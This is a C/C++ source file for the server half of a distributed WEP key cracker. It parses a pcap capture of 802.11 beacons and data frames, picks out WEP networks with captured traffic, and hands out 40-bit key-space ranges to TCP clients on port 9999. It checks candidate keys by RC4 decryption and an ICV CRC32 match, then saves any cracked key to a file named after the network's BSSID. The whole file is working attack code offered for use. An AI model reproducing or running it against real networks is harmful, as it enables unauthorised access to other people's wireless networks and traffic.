#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <math.h>
#include <pcap.h>
#include <sqlite3.h>
#include <iostream>
#include <signal.h>

#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>

using namespace std;

#include "main.h"

#include <openssl/rc4.h>

u_int32_t crc_tab[256];

char errbuf[PCAP_ERRBUF_SIZE];

pcap_t *handle;
struct pcap_pkthdr header;	/* The header that pcap gives us */
const u_char *packet;		/* The actual packet */
int i = 0;
int failed=0;
int off=0;
char time_temp[8];
int temp_jump=0;
unsigned char lbssid[6];
int tocrack;



//server
int serversock, clientsock;
struct sockaddr_in echoserver, echoclient;
unsigned char sckbff[256];
unsigned char sndsckbff[256];
int amtts = 0;
int key_found=0;

int sa,sb,sc=0;

//packet structs
int ctr=0;
int vctr=0;
int datactr=0;
SMALL_AP_BEACON_FRAME** smallAParray = NULL;
SMALL_AP_BEACON_FRAME** validAParray = NULL;
DATA_FRAME_TO_CRACK** dataframes = NULL;

#define CHECK_BIT(var,pos) ((var) & (1<<(pos)))

u_int32_t chksum_crc32 (unsigned char *block, unsigned int length);
void chksum_crc32gentab ();

static int callback(void *NotUsed, int argc, char **argv, char **azColName){
  int i;
  for(i=0; i<argc; i++){
    printf("%s = %s\n", azColName[i], argv[i] ? argv[i] : "NULL");
  }
  printf("\n");
  return 0;
}

u_int32_t chksum_crc32 (unsigned char *block, unsigned int length)
{
   register unsigned long crc;
   unsigned long i;

   crc = 0xFFFFFFFF;
   for (i = 0; i < length; i++)
   {
      crc = ((crc >> 8) & 0x00FFFFFF) ^ crc_tab[(crc ^ *block++) & 0xFF];
   }
   return (crc ^ 0xFFFFFFFF);
}

void chksum_crc32gentab ()
{
   unsigned long crc, poly;
   int i, j;

   poly = 0xEDB88320L;
   for (i = 0; i < 256; i++)
   {
      crc = i;
      for (j = 8; j > 0; j--)
      {
	 if (crc & 1)
	 {
	    crc = (crc >> 1) ^ poly;
	 }
	 else
	 {
	    crc >>= 1;
	 }
      }
      crc_tab[i] = crc;
   }
}


bool check_bssid(SMALL_AP_BEACON_FRAME** LAParray, int lctr,unsigned char * local_bssid)
{
	bool flag;

	if(lctr == 0)
		return true;
	
	for(int y=0;y < lctr;y++)
	{
		//printf("%02X:%02X:%02X:%02X:%02X:%02X ",LAParray[y]->bssid[0],LAParray[y]->bssid[1],LAParray[y]->bssid[2],LAParray[y]->bssid[3],LAParray[y]->bssid[4],LAParray[y]->bssid[5]);
		//printf("%02X:%02X:%02X:%02X:%02X:%02X \n",local_bssid[0],local_bssid[1],local_bssid[2],local_bssid[3],local_bssid[4],local_bssid[5]);
		
		for(int k=0;k<6;k++)
		{
			if(LAParray[y]->bssid[k] == local_bssid[k])
				flag = true;
			else
				flag = false;
		}
		if(flag == true)//we already have it
			return false;
	}
	return true;

}

unsigned int check_for_data(DATA_FRAME_TO_CRACK** dataarray, int dctr,unsigned char * local_bssid)
{
	bool flag;
	int n_data=0;
	
	if(dctr == 0)
		return 0;
	
	for(int y=0;y < dctr;y++)
	{
		for(int k=0;k<6;k++)
		{
			if(dataarray[y]->bssid[k] == local_bssid[k])
				flag = true;
			else
				flag = false;
		}
		if(flag == true)//we already have it
			n_data++;
	}
	return n_data;

}

unsigned int get_smallest_data_size(DATA_FRAME_TO_CRACK** dataarray, int dctr,unsigned char * local_bssid)
{
	int smallest_size_packet = 0;
	int data_size=65535;
	bool flag = false;
	
	if(dctr == 0)
		return 0;
	
	for(int y=0;y < dctr;y++)
	{
		for(int k=0;k<6;k++)
		{
			if(dataarray[y]->bssid[k] == local_bssid[k])
				flag = true;
			else
				flag = false;
		}
		if(flag)
		{
			if(dataarray[y]->data_size < data_size)
			{
					printf("%02X:%02X:%02X:%02X:%02X:%02X ",dataarray[y]->bssid[0],dataarray[y]->bssid[1],dataarray[y]->bssid[2],dataarray[y]->bssid[3],dataarray[y]->bssid[4],dataarray[y]->bssid[5]);
					printf("%02X:%02X:%02X:%02X:%02X:%02X \n",local_bssid[0],local_bssid[1],local_bssid[2],local_bssid[3],local_bssid[4],local_bssid[5]);
		
					data_size = dataarray[y]->data_size;
					smallest_size_packet = y;
			}
		}

	}

	return smallest_size_packet;

}

bool verify_the_key(DATA_FRAME_TO_CRACK** dataarray, int dctr,unsigned char * local_bssid, unsigned char * key)
{
	bool flag;
	int n_data=0;
	unsigned char full_key[8];
	unsigned char * icvp;
	unsigned int crc;
	unsigned int compcrc;

	for(int y=0;y < dctr;y++)
	{
		for(int k=0;k<6;k++)
		{
			if(dataarray[y]->bssid[k] == local_bssid[k])
				flag = true;
			else
				flag = false;
		}
		if(flag == true)//we already have it
		{
			//ok this is one of ours so lets check it out.
					full_key[0] = dataarray[y]->iv[0];//0xff
			    full_key[1] = dataarray[y]->iv[1];//0xff
			    full_key[2] = dataarray[y]->iv[2];//0x00
			   	full_key[3] = key[0];
				  full_key[4] = key[1];
				  full_key[5] = key[2];
				  full_key[6] = key[3];
				  full_key[7] = key[4];

					unsigned char * un_data_section = new unsigned char[dataarray[y]->data_size];

			    RC4_KEY rc4_key;
			    RC4_set_key(&rc4_key, sizeof(full_key), full_key);
					RC4(&rc4_key, dataarray[y]->data_size, dataarray[y]->encdata, un_data_section);
/*
					for(int k=0;k < dataarray[y]->data_size;k++)
						printf("%02X ",un_data_section[k]);
						
					printf("\n");
*/
				  icvp = un_data_section + dataarray[y]->data_size - 4;
				  crc = icvp[0] | (icvp[1] << 8) | (icvp[2] << 16) | (icvp[3] << 24);
					//printf("crc: %08X\n",crc);

					compcrc =  chksum_crc32(un_data_section, dataarray[y]->data_size-4);
					//printf("compcrc: %08X\n\n",compcrc);

					if(crc == compcrc)
							n_data++;

  				free(un_data_section);
					if(n_data >= 2)
						return true;
			
		}
	}
						return false;
}

void shutnicely(int sig)
{
	printf("signal caught: Shutting down\n");
		//clean up our main array for the aps
	 for(i = 0; i < ctr; i++) {
	  free(smallAParray[i]);
	  i++;
	 }
	 if(ctr > 0)
	 	free(smallAParray);

	 for(i = 0; i < datactr; i++) {
	  free(dataframes[i]->encdata);
	  free(dataframes[i]);
	  i++;
	 }
	 if(datactr > 0)
	 	free(dataframes);

	 for(i = 0; i < vctr; i++) {
	  free(validAParray[i]);
	  i++;
	 }
	 if(vctr > 0)
	 	free(validAParray);

	 	close(clientsock);
	 	close(serversock);
		exit(1);
}

int main(int argc, char *argv[])
{

	chksum_crc32gentab();
	
	if(argc <= 1)
	{
		printf("Usage:\n ./bruteforceserverall <filename>\n");
		return 0;
	}
	
	//catch some signals
  signal(SIGABRT, &shutnicely);
	signal(SIGTERM, &shutnicely);
	signal(SIGINT, &shutnicely);
	
	//server part
  /* Create the TCP socket */
  if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
    printf("failed\n");
    return 1;
  }
	int on = 1;
	int status = 0;
	//socket options
  status = setsockopt(serversock, SOL_SOCKET,SO_REUSEADDR,(const char *) &on, sizeof(on));

  /* Construct the server sockaddr_in structure */
  memset(&echoserver, 0, sizeof(echoserver));       /* Clear struct */
  echoserver.sin_family = AF_INET;                  /* Internet/IP */
  echoserver.sin_addr.s_addr = htonl(INADDR_ANY);   /* Incoming addr */
  echoserver.sin_port = htons(atoi("9999"));       /* server port */

	handle = pcap_open_offline(argv[1], errbuf);
	if (handle == NULL) {
	 fprintf(stderr, "Couldn't open file %s\n", errbuf);
	 return(2);
	}
	//file open, so lets loop through it
  while(1)
  {
  	off=0;
					
    if((packet = pcap_next(handle, &header)) == NULL)
      break;

		// Print its length
		//printf("Jacked a packet with length of [%d]\n", header.len);
		//0x08 data packet
		//0x80 beacon
		if(packet[0x00] == 0x80)//beacon
		{
			if(packet[0x24] == 0x00)
			{
					for(i=0;i < 6; i++)
						lbssid[i] = (unsigned char)packet[16+i];

				if(check_bssid(smallAParray,ctr,lbssid))
				{
					//woohoo dynamic allocation
					smallAParray = (struct SMALL_AP_BEACON_FRAME **)realloc(smallAParray, (ctr + 1) * sizeof(struct SMALL_AP_BEACON_FRAME *));
				  // allocate memory for one struct
				  smallAParray[ctr] = (struct SMALL_AP_BEACON_FRAME *)malloc(sizeof(struct SMALL_AP_BEACON_FRAME));
					
					off++;//frame_type
					off++;//frame_flag
					off = off + 2;//duration
					off = off + 6;//dest_addr
					off = off + 6;//src_addr

					for(i=0;i < 6; i++)
						smallAParray[ctr]->bssid[i] = (unsigned char)packet[off++];

					off = off + 2;//frag_seq
					//wireless management frame 12 bytes
					off = off + 8;//time_temp
					off = off + 2;//beacon_interval
					smallAParray[ctr]->cap_info = (packet[off+1] << 8) | packet[off+0];
					off = off + 2;
	
					if(CHECK_BIT(smallAParray[ctr]->cap_info,4))//check wep
						smallAParray[ctr]->wep_flag=1;
					else
						smallAParray[ctr]->wep_flag=0;

					//printf("off: %d len: %d \n",off,header.len);

					//tagged parameters set
					while(off < header.len)
					{
						//printf("s off %d headlen %d \n",off,header.len);
						if(packet[off] == 0x00)
						{
							//printf("ssid\n");
							//ssid
							off++;//jumping the ssid tag
							smallAParray[ctr]->ssid_len = packet[off++];
							for(i=0;i < smallAParray[ctr]->ssid_len; i++)
								smallAParray[ctr]->ssid_name[i] = (unsigned char)packet[off++];
								smallAParray[ctr]->ssid_name[i]=0;
						}
						else if(packet[off] == 0xDD)
						{
							//printf("vendor specific\n");
							off++;//jump tag
							int vndr_size = packet[off++];
							//printf("size %d\n",vndr_size);
							if(vndr_size == 26 || vndr_size == 24 || vndr_size == 22)
							{
								//printf("possible wpa\n");
								int wpa_check = (packet[off+0] << 32) | (packet[off+1] << 16) | (packet[off+2] << 8) | packet[off+3];
								if(wpa_check == 0x0050F201)
								{
									smallAParray[ctr]-> wpa_flag = 1;
									smallAParray[ctr]-> wep_flag = 0;
								}
								off = off + vndr_size;
							}
							else
							{
								off = off + vndr_size;
							}
						}
						else
						{
							//this gets rid of the crap I don't care about
							off++;//jump tag
							temp_jump = packet[off++];
							off = off + temp_jump;
						}
					}
				ctr++;
				}
			}
		}
		else if(packet[0x00] == 0x08)
		{
					//printf("data packet\n");
					//woohoo dynamic allocation
					dataframes = (struct DATA_FRAME_TO_CRACK **)realloc(dataframes, (datactr + 1) * sizeof(struct DATA_FRAME_TO_CRACK *));
				  // allocate memory for one struct
				  dataframes[datactr] = (struct DATA_FRAME_TO_CRACK *)malloc(sizeof(struct DATA_FRAME_TO_CRACK));

					off++;//frame_type
					unsigned char frame_flag = packet[off++];
					off = off + 2;//duration
					//arrggg need to parse out the flag so when know if the data is coming or going
					if(CHECK_BIT(frame_flag,1))//check ap
					{
						off = off + 6;//dest_addr
						for(i=0;i < 6; i++)
							dataframes[datactr]->bssid[i] = (unsigned char)packet[off++];
						
					}
					else
					{
						for(i=0;i < 6; i++)
							dataframes[datactr]->bssid[i] = (unsigned char)packet[off++];
						off = off + 6;//dest_addr
					}
					//printf("%02X:%02X:%02X:%02X:%02X:%02X \n",dataframes[datactr]->bssid[0],dataframes[datactr]->bssid[1],dataframes[datactr]->bssid[2],dataframes[datactr]->bssid[3],dataframes[datactr]->bssid[4],dataframes[datactr]->bssid[5]);

					off = off + 6;//src_addr
					off = off + 2;//frag_seq

					for(i=0;i<3;i++)
						dataframes[datactr]->iv[i] = (unsigned char)packet[off++];

					unsigned char key_index = (unsigned char)packet[off++];

					dataframes[datactr]->data_size = (header.len) - off; 
					
					//printf("data_size: %d\n",dataframes[datactr]->data_size);

					if(dataframes[datactr]->data_size > 0)
					{
						dataframes[datactr]->encdata = new unsigned char[dataframes[datactr]->data_size];
	
						for(i = 0;i < dataframes[datactr]->data_size; i ++)
						{
							dataframes[datactr]->encdata[i] = (unsigned char)packet[off+i];
						}

						datactr++;
					}
		}

		
	}
	// And close the session
	pcap_close(handle);

	//done with the packets
	for(int k =0;k < ctr;k++)
	{
		if(smallAParray[k]->wep_flag == 1)//only want wep
		{
			smallAParray[k]->datanum = check_for_data(dataframes, datactr, smallAParray[k]->bssid);
			if(smallAParray[k]->datanum > 1)//only want some data
			{
				//unit with data and wep
					validAParray = (struct SMALL_AP_BEACON_FRAME **)realloc(validAParray, (ctr + 1) * sizeof(struct SMALL_AP_BEACON_FRAME *));
				  // allocate memory for one struct
				  validAParray[vctr] = (struct SMALL_AP_BEACON_FRAME *)malloc(sizeof(struct SMALL_AP_BEACON_FRAME));
				  validAParray[vctr] = smallAParray[k];
				  vctr++;
			}
		}
	}

	//printf("------------------------------------------------------------------------------------------------------\n");
	printf("data frames: %d\n",datactr);
	printf("total number of Valid APs: %d\n",vctr);

	printf("   %16s %32s %4s %4s \n","BSSID","SSID","ENC","data");

	for(int k =0;k < vctr;k++)
	{
		printf("%003d %02X:%02X:%02X:%02X:%02X:%02X ",k,validAParray[k]->bssid[0],validAParray[k]->bssid[1],validAParray[k]->bssid[2],validAParray[k]->bssid[3],validAParray[k]->bssid[4],validAParray[k]->bssid[5]);
		printf("%32s ",validAParray[k]->ssid_name);
		
		if(validAParray[k]->wep_flag == 1)
			printf("WEP ");
		else if(validAParray[k]->wpa_flag == 1)
			printf("WPA ");
		else
			printf("--- ");
			
			printf("%002d\n",validAParray[k]->datanum);
	}//end of looking through the basestations

	printf("Please enter the number of the network(-1 to exit): ");
	//cin >> tocrack;
	tocrack=0;
	if(tocrack < 0)
	{
		//free up the ram for the data frames
		exit(1);
	}
	else
	{
		//clearing out the array screwed up the multi packet cracking..
		/*
	 for(i = 0; i < ctr; i++) {
	  free(smallAParray[i]);
	  i++;
	 }
	 free(smallAParray);
	 ctr=0;//set to 0 so if we ctl-C we won't try to free it again
		*/
		//socket stuff
    // Bind the server socket
    if (bind(serversock, (struct sockaddr *) &echoserver, sizeof(echoserver)) < 0) {
      printf("Failed to bind the server socket\n");
			//free up the ram for the data frames
			exit(1);
    }
    // Listen on the server socket
    if (listen(serversock, 5) < 0) {
      printf("Failed to listen on server socket\n");
			//free up the ram for the data frames
      exit(1);
    }

	 printf("We will try to crack them all! \n");
for(tocrack=0;tocrack < vctr; tocrack++)
{
		//printf("spot in loop %d datactr: %d \n",tocrack,datactr);
		//printf("%02X:%02X:%02X:%02X:%02X:%02X \n",validAParray[tocrack]->bssid[0],validAParray[tocrack]->bssid[1],validAParray[tocrack]->bssid[2],validAParray[tocrack]->bssid[3],validAParray[tocrack]->bssid[4],validAParray[tocrack]->bssid[5]);
		//printf("time to find the smallest packet\n");
		int packet_to_crack = get_smallest_data_size(dataframes, datactr, validAParray[tocrack]->bssid);
		//printf("packet to crack %d \n",packet_to_crack);
		//printf("%003d %02X:%02X:%02X:%02X:%02X:%02X ",tocrack,validAParray[tocrack]->bssid[0],validAParray[tocrack]->bssid[1],validAParray[tocrack]->bssid[2],validAParray[tocrack]->bssid[3],validAParray[tocrack]->bssid[4],validAParray[tocrack]->bssid[5]);

		// Run until cancelled
		while (1) 
		{
			if(failed == 1)
			{
				close(clientsock);
				close(serversock);
		    // Bind the server socket
		    if (bind(serversock, (struct sockaddr *) &echoserver, sizeof(echoserver)) < 0) {
		      printf("Failed to bind the server socket\n");
					//free up the ram for the data frames
					sleep(30);
				}
		    else
		    	failed = 0;	
		    // Listen on the server socket
		    if (listen(serversock, 5) < 0) {
		      printf("Failed to listen on server socket\n");
					//free up the ram for the data frames
					sleep(30);
		    }
		    else
					failed = 0;				
			}

			printf("%003d %02X:%02X:%02X:%02X:%02X:%02X ",tocrack,dataframes[packet_to_crack]->bssid[0],dataframes[packet_to_crack]->bssid[1],dataframes[packet_to_crack]->bssid[2],dataframes[packet_to_crack]->bssid[3],dataframes[packet_to_crack]->bssid[4],dataframes[packet_to_crack]->bssid[5]);
			printf("Next Key Space: %02X %02X %02X %02X %02X \n",sa,sb,0x00,0x00,0x00);
			//printf("waiting for a client to connect...\n");
		  unsigned int clientlen = sizeof(echoclient);
		  // Wait for client connection
		  if ((clientsock = accept(serversock, (struct sockaddr *) &echoclient, &clientlen)) < 0) 
		  {
		    printf("Failed to accept client connection\n");
		    close(clientsock);
		    failed=1;
		  }
		  else
		  fprintf(stdout, "Client connected: %s\n", inet_ntoa(echoclient.sin_addr));
		  //handle the client
			
      int received = -1;
      // Receive message
      if ((received = recv(clientsock, sckbff, 256, 0)) < 0) {
        printf("Failed to receive initial bytes from client\n");
        close(clientsock);
        failed=1;
      }
      //printf("read %d bytes\n",received);
      //send back the info
      if (received > 0) 
      {
if(key_found == 1)
{
	//we have found the key
		//sndsckbff[0]=0x08;
		//amtts=1;
		key_found = 0;
		break;//should break the loop
		
}
else
{
      	//parse through to see what packet we got
      	if(sckbff[0] == 1)
      	{
      		//printf("client first connected\n");
      		//it is a client connecting
      		sndsckbff[0] = 0x02;//we are sending data to the client
      		sndsckbff[1] = dataframes[packet_to_crack]->iv[0];//iv1
      		sndsckbff[2] = dataframes[packet_to_crack]->iv[1];//iv2
      		sndsckbff[3] = dataframes[packet_to_crack]->iv[2];//iv3
      		//section to try
      		sndsckbff[4] = sa;//a
      		sndsckbff[5] = sb;//b
      		sndsckbff[6] = sc;//c
      		//printf("data size: %08X\n",dataframes[packet_to_crack]->data_size);
      		
      		//size of data packet
      		sndsckbff[7] = dataframes[packet_to_crack]->data_size & 0xFF;//top
      		sndsckbff[8] = (dataframes[packet_to_crack]->data_size>> 8) & 0xFF;//bottom
      		
      		amtts = 9 + dataframes[packet_to_crack]->data_size;
      		for(int k = 0; k < dataframes[packet_to_crack]->data_size; k++)
      		{
      			sndsckbff[9+k] = dataframes[packet_to_crack]->encdata[k];
      		}
					sc=0x00;
					sb++;
					if(sb >=0xFF)
					{
						sb=0x00;
						sa++;
					}
					if(sa >=0xFF)
					{
						printf("error: ran out of keyspace\n");
						 exit(1);
					}
      	}
      	else if(sckbff[0] == 0x03)
      	{
      		//printf("client done with its packet, but no key found\n");
      		//printf("client first connected\n");
      		//it is a client connecting
      		sndsckbff[0] = 0x02;//we are sending data to the client
      		sndsckbff[1] = dataframes[packet_to_crack]->iv[0];//iv1
      		sndsckbff[2] = dataframes[packet_to_crack]->iv[1];//iv2
      		sndsckbff[3] = dataframes[packet_to_crack]->iv[2];//iv3
      		//section to try
      		sndsckbff[4] = sa;//a
      		sndsckbff[5] = sb;//b
      		sndsckbff[6] = sc;//c
      		//printf("data size: %08X\n",dataframes[packet_to_crack]->data_size);
      		
      		//size of data packet
      		sndsckbff[7] = dataframes[packet_to_crack]->data_size & 0xFF;//top
      		sndsckbff[8] = (dataframes[packet_to_crack]->data_size>> 8) & 0xFF;//bottom
      		
      		amtts = 9 + dataframes[packet_to_crack]->data_size;
      		for(int k = 0; k < dataframes[packet_to_crack]->data_size; k++)
      		{
      			sndsckbff[9+k] = dataframes[packet_to_crack]->encdata[k];
      		}
					sc=0x00;
					sb++;
					if(sb >=0xFF)
					{
						sb=0x00;
						sa++;
					}
					if(sa >=0xFF)
					{
						 printf("error: ran out of keyspace\n");
						 exit(1);
					}
      	}
      	else if(sckbff[0] == 0x04)
      	{
    			sndsckbff[0]=0x05;
    			amtts=1;
    			send(clientsock, sndsckbff, amtts, 0);
      			
      		unsigned char poskey[5];
      		printf("possible key!\n");
      		for(int i =1;i< received;i++)
      		{
      			printf("%02X",sckbff[i]);
      			poskey[i-1] = sckbff[i];
      		}
      		printf("\n\n");
      		
      		//need a function to check the next data and make sure we are ok.
      		bool areweok = verify_the_key(dataframes, datactr,dataframes[packet_to_crack]->bssid,poskey);
      		if(areweok)
      		{
      			printf("key is valid!\n");
						key_found = 1;
						amtts=0;
						//lets save the key to a file :)
						FILE * pFile;
						char filename[32];
						sprintf(filename,"%02X:%02X:%02X:%02X:%02X:%02X.key",dataframes[packet_to_crack]->bssid[0],dataframes[packet_to_crack]->bssid[1],dataframes[packet_to_crack]->bssid[2],dataframes[packet_to_crack]->bssid[3],dataframes[packet_to_crack]->bssid[4],dataframes[packet_to_crack]->bssid[5]);
						pFile = fopen (filename,"w");
						fprintf (pFile, "%02X%02X%02X%02X%02X\n",poskey[0],poskey[1],poskey[2],poskey[3],poskey[4]);
						fclose (pFile);
      		}
      		else
      		{
      			//false so continue
      			printf("false so continue!\n");
						//going to save the false keys
						FILE * pFile;
						pFile = fopen ("falsekeys.key","a");
						fprintf (pFile, "%02X:%02X:%02X:%02X:%02X:%02X %02X%02X%02X %02X%02X%02X%02X%02X\n",dataframes[packet_to_crack]->bssid[0],dataframes[packet_to_crack]->bssid[1],dataframes[packet_to_crack]->bssid[2],dataframes[packet_to_crack]->bssid[3],dataframes[packet_to_crack]->bssid[4],dataframes[packet_to_crack]->bssid[5],dataframes[packet_to_crack]->iv[0],dataframes[packet_to_crack]->iv[1],dataframes[packet_to_crack]->iv[2],poskey[0],poskey[1],poskey[2],poskey[3],poskey[4]);
						fclose (pFile);
      			amtts=0;
      		}
      	}
}

				if(amtts > 0)
				{
        // Send back received data
        if (send(clientsock, sndsckbff, amtts, 0) != amtts) {
          printf("Failed to send bytes to client\n");
        }
				//else
				//	printf("send %d bytes\n",amtts);
				}
      }
      close(clientsock);
			//break;
		}
	printf("time to try cracking the next one\n");
	sa = 0x00;//a
  sb = 0x00;//b
  sc = 0x00;//c
}//end of our loop to do them all
	}

	

	exit(0);
	return 0;
}


